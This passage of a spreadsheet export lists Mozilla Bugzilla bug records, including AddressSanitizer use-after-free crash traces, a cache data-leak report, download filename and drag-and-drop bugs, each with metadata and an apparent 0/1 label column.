    #27 0x7f9045e5f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #28 0x7f9045e602a2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #29 0x7f90468a511b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3032:12
    #30 0x7f903f43cb17 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #31 0x7f903fe0c13c in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #32 0x7f903fe0c13c in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1115
    #33 0x7f903fe0e342 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #34 0x7f903fdedd2a in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:486:14
    #35 0x7f903fdf0f32 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #36 0x7f903fdc01ba in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:895:12
    #37 0x7f903df8b7c1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1356:5
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f90400125a3 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f90400125a3 in NS_NewHTMLBodyElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLBodyElement.cpp:24
    #4 0x7f9042a4711f in nsContentDLF::CreateBlankDocument(nsILoadGroup*, nsIPrincipal*, nsDocShell*) /builds/worker/workspace/build/src/layout/build/nsContentDLF.cpp:308:5
    #5 0x7f90451a6d2e in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8252:16
    #6 0x7f904514645f in nsDocShell::EnsureContentViewer() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8128:17
    #7 0x7f904517ada7 in GetDocument /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4647:3
    #8 0x7f904517ada7 in non-virtual thunk to nsDocShell::GetDocument() /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:4645
    #9 0x7f903dbcff33 in MaybeCreateDoc /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:4115:48
    #10 0x7f903dbcff33 in GetDoc /builds/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:213
    #11 0x7f903dbcff33 in EnsureInnerWindow /builds/worker/workspace/build/src/obj-firefox/dist/include/nsPIDOMWindow.h:978
    #12 0x7f903dbcff33 in WrapObject /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.h:302
    #13 0x7f903dbcff33 in non-virtual thunk to nsGlobalWindow::WrapObject(JSContext*, JS::Handle&lt;JSObject*&gt;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.h:300
    #14 0x7f903c82f459 in XPCConvert::NativeInterface2JSObject(JS::MutableHandle&lt;JS::Value&gt;, xpcObjectHelper&amp;, nsID const*, bool, nsresult*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:758:23
    #15 0x7f903c82e08f in XPCConvert::NativeData2JS(JS::MutableHandle&lt;JS::Value&gt;, void const*, nsXPTType const&amp;, nsID const*, nsresult*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCConvert.cpp:345:16
    #16 0x7f903c8cfba9 in GatherAndConvertResults /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1532:18
    #17 0x7f903c8cfba9 in Call /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1326
    #18 0x7f903c8cfba9 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1282
    #19 0x7f903c8d6385 in GetAttribute /builds/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1679:17
    #20 0x7f903c8d6385 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:965
    #21 0x7f9045e5f2b0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #22 0x7f9045e5f2b0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #23 0x7f9045e61285 in InternalCall /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:522:12
    #24 0x7f9045e61285 in Call /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541
    #25 0x7f9045e61285 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:656
    #26 0x7f9046de3b8c in CallGetter /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2118:16
    #27 0x7f9046de3b8c in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2171
    #28 0x7f9046de3b8c in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2374
    #29 0x7f9046de3b8c in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2410
    #30 0x7f9045e6a8e8 in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1616:12
    #31 0x7f9045e6a8e8 in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:805
    #32 0x7f9045e6a8e8 in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4407
    #33 0x7f9045e4cfe4 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #34 0x7f9045e4cfe4 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2817
    #35 0x7f9045e3287a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #36 0x7f9045e5f3af in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #37 0x7f9045e602a2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #38 0x7f90468a3293 in JS_CallFunctionValue(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:2973:12
    #39 0x7f903c8b5703 in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/worker/workspace/build/src/js/xpconnect/src/XPCWrappedJSClass.cpp:1317:23
    #40 0x7f903b0e8eca in PrepareAndDispatch /builds/worker/workspace/build/src/xpcom/reflect/xptcall/md/unix/xptcstubs_x86_64_linux.cpp:120:28
    #41 0x7f903b0e7ea6 in SharedStub (/fuzzer3/firefox/libxul.so+0x21dcea6)
    #42 0x7f90459bd819 in nsBrowserStatusFilter::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/toolkit/components/statusfilter/nsBrowserStatusFilter.cpp:211:27
    #43 0x7f903cce2783 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #44 0x7f903cce12e0 in nsDocLoader::FireOnStateChange(nsIWebProgress*, nsIRequest*, int, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1284:14
    #45 0x7f903ccdfd55 in doStartURLLoad /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:799:3
    #46 0x7f903ccdfd55 in nsDocLoader::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:483
    #47 0x7f903cce000c in non-virtual thunk to nsDocLoader::OnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:394:14
    #48 0x7f903b263c05 in mozilla::net::nsLoadGroup::AddRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:510:28
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/dom/base/nsINode.h:1614:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a800006c0: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fd fd
  0x0c1a800006d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1a800006e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a800006f0: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a80000700: fa fa fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c1a80000710: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd[fd]
  0x0c1a80000720: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
  0x0c1a80000730: fa fa fa fa fa fa fd fd fd fd fd fd fd fd fd fd
  0x0c1a80000740: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
  0x0c1a80000750: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1a80000760: fd fa fa fa fa fa fa fa fa fa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5937==ABORTING</t>
        </is>
      </c>
      <c r="X5666" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5667">
      <c r="A5667" t="n">
        <v>155569</v>
      </c>
      <c r="B5667" t="inlineStr">
        <is>
          <t>2002-07-03 05:08:55 -0700</t>
        </is>
      </c>
      <c r="C5667" t="inlineStr">
        <is>
          <t>null filename (+ extension) used for downloading files with non-ASCII names</t>
        </is>
      </c>
      <c r="D5667" t="inlineStr">
        <is>
          <t>2016-06-22 12:16:36 -0700</t>
        </is>
      </c>
      <c r="E5667" t="n">
        <v>1</v>
      </c>
      <c r="F5667" t="n">
        <v>1</v>
      </c>
      <c r="G5667" t="n">
        <v>6</v>
      </c>
      <c r="H5667" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5667" t="inlineStr">
        <is>
          <t>Core Graveyard</t>
        </is>
      </c>
      <c r="J5667" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K5667" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5667" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5667" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5667" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5667" t="inlineStr">
        <is>
          <t>[adt2 RTM] [ETA 08/21] [Post MachV]</t>
        </is>
      </c>
      <c r="Q5667" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5667" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S5667" t="inlineStr">
        <is>
          <t>mozilla1.0.1</t>
        </is>
      </c>
      <c r="T5667" t="n">
        <v>1</v>
      </c>
      <c r="U5667" t="n">
        <v>0</v>
      </c>
      <c r="V5667" t="n">
        <v>80</v>
      </c>
      <c r="W5667" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i586; en-US; rv:1.1a) Gecko/20020610
BuildID:    20020610
Mozilla invents a msdos-like filename (8+3) and .exe extension   when trying to
download a file with non-english characters like ñ or &amp;aacute; &amp;eacute; etc
Reproducible: Always
Steps to Reproduce:
1. Try to download a file with non-english characteres (for example:
mañana_fria.mp3)
Actual Results:  Mozilla suggest a bad msdos-like filename like xangkbqh.exe,
SFensxGx.exe, ... always a different filename
Expected Results:  save file as his original filename =)</t>
        </is>
      </c>
      <c r="X5667" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5668">
      <c r="A5668" t="n">
        <v>760996</v>
      </c>
      <c r="B5668" t="inlineStr">
        <is>
          <t>2012-06-03 09:38:05 -0700</t>
        </is>
      </c>
      <c r="C5668" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsTArray_base&lt;nsTArrayDefaultAllocator&gt;::Length()</t>
        </is>
      </c>
      <c r="D5668" t="inlineStr">
        <is>
          <t>2024-05-29 16:01:28 -0700</t>
        </is>
      </c>
      <c r="E5668" t="n">
        <v>1</v>
      </c>
      <c r="F5668" t="n">
        <v>1</v>
      </c>
      <c r="G5668" t="n">
        <v>3</v>
      </c>
      <c r="H5668" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5668" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5668" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K5668" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5668" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5668" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5668" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5668" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5668" t="inlineStr">
        <is>
          <t>[advisory-tracking+][asan] fixed by bug 761507</t>
        </is>
      </c>
      <c r="Q5668" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5668" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5668" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5668" t="n">
        <v>0</v>
      </c>
      <c r="U5668" t="n">
        <v>0</v>
      </c>
      <c r="V5668" t="n">
        <v>13</v>
      </c>
      <c r="W5668" t="inlineStr">
        <is>
          <t>Created attachment 629613
test-case triggering the crash (*.zip)
ASan detected use-after-free when running attached test-case. ASan log is for build http://hg.mozilla.org/mozilla-central/rev/12ab69851e05
When testing, was not able to reproduce on Windows 7 x64 - nor stable, neither 15.0a1. Crashes for me only on Linux (Ubuntu 11.10 x64)</t>
        </is>
      </c>
      <c r="X5668" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5669">
      <c r="A5669" t="n">
        <v>514148</v>
      </c>
      <c r="B5669" t="inlineStr">
        <is>
          <t>2009-09-02 03:15:43 -0700</t>
        </is>
      </c>
      <c r="C5669" t="inlineStr">
        <is>
          <t>Thundirbird 3 AND Firefox freeze when you drag a mail attachment over a Firefox Window</t>
        </is>
      </c>
      <c r="D5669" t="inlineStr">
        <is>
          <t>2009-11-16 13:03:28 -0800</t>
        </is>
      </c>
      <c r="E5669" t="n">
        <v>1</v>
      </c>
      <c r="F5669" t="n">
        <v>1</v>
      </c>
      <c r="G5669" t="n">
        <v>3</v>
      </c>
      <c r="H5669" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5669" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5669" t="inlineStr">
        <is>
          <t>DOM: Copy &amp; Paste and Drag &amp; Drop</t>
        </is>
      </c>
      <c r="K5669" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5669" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5669" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5669" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5669" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5669" t="inlineStr"/>
      <c r="Q5669" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5669" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5669" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5669" t="n">
        <v>1</v>
      </c>
      <c r="U5669" t="n">
        <v>0</v>
      </c>
      <c r="V5669" t="n">
        <v>22</v>
      </c>
      <c r="W5669" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) XPCOMViewer/0.9a
Build Identifier: 
If you drag a mail attachment over a firefox window, Thunderbird and Firefox freeze and Firefox memory grows indefinitely.
Tested on Windows XP with Firefox 3.5.2 and :
- thunderbird/nightly/2009-09-01-15-comm-central-trunk 
- thunderbird/nightly/2009-09-01-11-comm-1.9.1/
- Xulrunner 1.9.1 (with my own application Scenari)
Problem does not appear on Linux.
Reproducible: Always
With 1.9.1 XulRunner, in my code (similar to thunderbird http://mxr.mozilla.org/comm-central/source/mail/base/content/msgHdrViewOverlay.js#1837), my DataProvider.getFlavorData() method is nether called by the framework. This method is called in thunderbird 2.0.</t>
        </is>
      </c>
      <c r="X5669" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5670">
      <c r="A5670" t="n">
        <v>10762</v>
      </c>
      <c r="B5670" t="inlineStr">
        <is>
          <t>1999-07-29 11:48:13 -0700</t>
        </is>
      </c>
      <c r="C5670" t="inlineStr">
        <is>
          <t>Crasho manipulating &lt;select&gt;/&lt;option&gt; with JavaScript</t>
        </is>
      </c>
      <c r="D5670" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E5670" t="n">
        <v>1</v>
      </c>
      <c r="F5670" t="n">
        <v>1</v>
      </c>
      <c r="G5670" t="n">
        <v>3</v>
      </c>
      <c r="H5670" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5670" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5670" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5670" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5670" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5670" t="inlineStr">
        <is>
          <t>Windows NT</t>
        </is>
      </c>
      <c r="N5670" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5670" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5670" t="inlineStr"/>
      <c r="Q5670" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5670" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5670" t="inlineStr">
        <is>
          <t>M11</t>
        </is>
      </c>
      <c r="T5670" t="n">
        <v>1</v>
      </c>
      <c r="U5670" t="n">
        <v>0</v>
      </c>
      <c r="V5670" t="n">
        <v>8</v>
      </c>
      <c r="W5670" t="inlineStr">
        <is>
          <t>I was playing with an old .xml file and produced a crash.  The URL above will
take you to the page (careful, it crashes 5.0!).  Here's the stack when it
crashes:
nsOptionList::IndexOf(nsIContent * 0x0a22453c) line 988 + 3 bytes
nsHTMLSelectElement::RemoveOption(nsHTMLSelectElement * const 0x0a224a3c,
nsIContent * 0x0a22453c) line 658 + 15 bytes
nsHTMLOptionElement::SetParent(nsHTMLOptionElement * const 0x0a22453c,
nsIContent * 0x00000000) line 197
nsGenericHTMLContainerElement::RemoveChildAt(int 0x00000001, int 0x00000001)
line 2780
nsGenericHTMLContainerElement::RemoveChild(nsIDOMNode * 0x0a224530, nsIDOMNode *
* 0x0012e96c) line 2588 + 14 bytes
nsHTMLSelectElement::RemoveChild(nsHTMLSelectElement * const 0x0a224a20,
nsIDOMNode * 0x0a224530, nsIDOMNode * * 0x0012e96c) line 120 + 22 bytes
NodeRemoveChild(JSContext * 0x09e07310, JSObject * 0x00e1a0c8, unsigned int
0x00000001, long * 0x00d90f50, long * 0x0012ea28) line 543 + 25 bytes
js_Invoke(JSContext * 0x09e07310, unsigned int 0x00000001, unsigned int
0x00000000) line 654 + 26 bytes
js_Interpret(JSContext * 0x09e07310, long * 0x0012f254) line 2228 + 15 bytes
js_Invoke(JSContext * 0x09e07310, unsigned int 0x00000000, unsigned int
0x00000000) line 670 + 13 bytes
js_Interpret(JSContext * 0x09e07310, long * 0x0012fa2c) line 2228 + 15 bytes
js_Execute(JSContext * 0x09e07310, JSObject * 0x00d82e58, JSScript * 0x0a220f40,
JSFunction * 0x00000000, JSStackFrame * 0x00000000, int 0x00000000, long *
0x0012fa2c) line 827 + 13 bytes
JS_EvaluateUCScriptForPrincipals(JSContext * 0x09e07310, JSObject * 0x00d82e58,
JSPrincipals * 0x0a219260, const unsigned short * 0x0012fadc, unsigned int
0x0000000d, const char * 0x0a220fd0, unsigned int 0x0000007d, long * 0x0012fa2c)
line 2596 + 27 bytes
nsJSContext::EvaluateString(nsJSContext * const 0x09e07480, const nsString &amp;
{...}, const char * 0x0a220fd0, unsigned int 0x0000007d, nsString &amp; {...}, int *
0x0012fa50) line 155 + 66 bytes
nsXMLContentSink::EvaluateScript(nsXMLContentSink * const 0x0a230b10, nsString &amp;
{...}, unsigned int 0x0000007d) line 1680 + 32 bytes
nsXMLContentSink::ProcessEndSCRIPTTag(const nsIParserNode &amp; {...}) line 1703 +
23 bytes
nsXMLContentSink::CloseContainer(nsXMLContentSink * const 0x0a230b10, const
nsIParserNode &amp; {...}) line 774 + 12 bytes
CWellFormedDTD::HandleToken(CWellFormedDTD * const 0x0a1fb830, CToken *
0x09af48e0, nsIParser * 0x0a237da0) line 539 + 22 bytes
CWellFormedDTD::BuildModel(CWellFormedDTD * const 0x0a1fb830, nsIParser *
0x0a237da0, nsITokenizer * 0x0a1fa920, nsITokenObserver * 0x00000000,
nsIContentSink * 0x0a230b10) line 253 + 20 bytes
nsParser::BuildModel() line 941 + 34 bytes
nsParser::ResumeParse(nsIDTD * 0x00000000, int 0x00000000) line 886 + 11 bytes
nsParser::OnDataAvailable(nsParser * const 0x0a237da4, nsIChannel * 0x0a22e790,
nsISupports * 0x00000000, nsIInputStream * 0x0a22cfe0, unsigned int 0x00000000,
unsigned int 0x00001159) line 1159 + 19 bytes
nsDocumentBindInfo::OnDataAvailable(nsDocumentBindInfo * const 0x0a21e950,
nsIChannel * 0x0a22e790, nsISupports * 0x00000000, nsIInputStream * 0x0a22cfe0,
unsigned int 0x00000000, unsigned int 0x00001159) line 2024 + 32 bytes
nsOnDataAvailableEvent::HandleEvent(nsOnDataAvailableEvent * const 0x0a233890)
line 350
nsStreamListenerEvent::HandlePLEvent(PLEvent * 0x0a233894) line 149 + 12 bytes
PL_HandleEvent(PLEvent * 0x0a233894) line 509 + 10 bytes
PL_ProcessPendingEvents(PLEventQueue * 0x00ae2b40) line 470 + 9 bytes
_md_EventReceiverProc(HWND__ * 0x052d0532, unsigned int 0x0000c0aa, unsigned int
0x00000000, long 0x00ae2b40) line 932 + 9 bytes
USER32! 77e713ed()
00ae2b40()</t>
        </is>
      </c>
      <c r="X5670" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5671">
      <c r="A5671" t="n">
        <v>347852</v>
      </c>
      <c r="B5671" t="inlineStr">
        <is>
          <t>2006-08-08 03:30:29 -0700</t>
        </is>
      </c>
      <c r="C5671" t="inlineStr">
        <is>
          <t>reload leaks data from cache to end of page after hash collision in cache</t>
        </is>
      </c>
      <c r="D5671" t="inlineStr">
        <is>
          <t>2007-02-23 13:43:51 -0800</t>
        </is>
      </c>
      <c r="E5671" t="n">
        <v>1</v>
      </c>
      <c r="F5671" t="n">
        <v>1</v>
      </c>
      <c r="G5671" t="n">
        <v>3</v>
      </c>
      <c r="H5671" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5671" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5671" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5671" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5671" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5671" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5671" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5671" t="inlineStr">
        <is>
          <t>[sg:high?]</t>
        </is>
      </c>
      <c r="Q5671" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5671" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5671" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5671" t="n">
        <v>1</v>
      </c>
      <c r="U5671" t="n">
        <v>0</v>
      </c>
      <c r="V5671" t="n">
        <v>31</v>
      </c>
      <c r="W5671" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.6) Gecko/20060728 Firefox/1.5.0.6
On certain pages, when pressing F5, Firefox adds text from another page (from the cache?) to the end of the current page. Pressing Ctrl-F5 then shows the page as it should be.
This problem does not occur in IE, or when the Firefox cache has been disabled.
Reproducible: Always
Steps to Reproduce:
1.Go to http://www.oldwings.nl/content/c47_yic/c47x.htm
2.Then go to http://www.oldwings.nl/content/c82_yic/c82x.htm
3.Go to the end of the page, everything is ok.
4.Now press F5 and voila, there is the garbage at the end of the page.
5.Press Ctrl-F5 and the garbage is gone.
Actual Results:  
Showed garbage from the previous page after the end of the current page.
Expected Results:  
It should not have shown the extra garbage at the end.
I don't know why it is only this particular combination of pages that produces this. It appears to be related to the file name. The problem does NOT occur if you do this:
1.Go to http://www.oldwings.nl/content/c47_yic/xc47.htm
2.Then go to http://www.oldwings.nl/content/c82_yic/xc82.htm
Pages are identical to the ones mentioned above, only the filename differs.
Trying to disable the browser cache through meta tags does not help, I have yet to try adding HTTP headers.
Also happens in Firefox 1.0.4 and can be reproduced as above. The garbage has also be seen by a friend using the Mozilla suite (version unknown), but it could not be reproduced using the above method.</t>
        </is>
      </c>
      <c r="X5671" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5672">
      <c r="A5672" t="n">
        <v>325761</v>
      </c>
      <c r="B5672" t="inlineStr">
        <is>
          <t>2006-02-03 09:17:55 -0800</t>
        </is>
      </c>
      <c r="C5672" t="inlineStr">
        <is>
          <t>memory corruption in mozilla &lt;object data='x-jsd:help'&gt;</t>
        </is>
      </c>
      <c r="D5672" t="inlineStr">
        <is>
          <t>2018-10-16 12:20:08 -0700</t>
        </is>
      </c>
      <c r="E5672" t="n">
